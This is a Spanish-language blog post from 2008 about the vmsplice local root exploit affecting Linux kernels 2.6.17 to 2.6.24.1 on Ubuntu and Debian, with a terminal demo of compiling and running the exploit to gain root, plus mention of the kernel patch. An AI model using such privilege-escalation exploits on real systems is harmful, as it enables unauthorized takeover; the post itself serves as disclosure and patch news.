Local Root Exploit en Linux Kernel 2.6 Ubuntu y Debian

Ξ February 14th, 2008 | → 0 Comments | ∇ Bugs y Exploits, Linux |

Un exploit interesante ha salido para ubuntu y debaian, el exploit tiene q ejecutarse localmente para tener acceso de root en el sistema.

Los Kernel Linux afectados son desde la versión 2.6.17 hasta 2.6.24.1. Por el momento para solucionar el problema de seguridad, habría que compilar nuestro propio kernel eliminando vmsplice.

Los exploits funcionan perfectamente y pueden verlos aqui exploit y este otro.

En seguinfo han probado el exploit y les ha funcionado perfectamente. aqui esta el ejemplo

Kernel 2.6.22-14-generic:

$ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
——-

——-——-——-——-
Linux vmsplice Local Root Exploit
By qaaz
——-——-——-——-——-
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root

Se ve que hasta el software libre tiene sus problemas, pero es mejor que Windows claro.

Ya esta tambien el parche para solucionar el problema y tambien se puede actualizar el Kernel consiguiendo aqui nueva versión del kernel (2.6.24.2) con el bug resuelto

 

  • Tags

  • Donacion

    Amount:

    Website(Optional):

  • recomendaciones

  • RSS Shadow Security

  • Login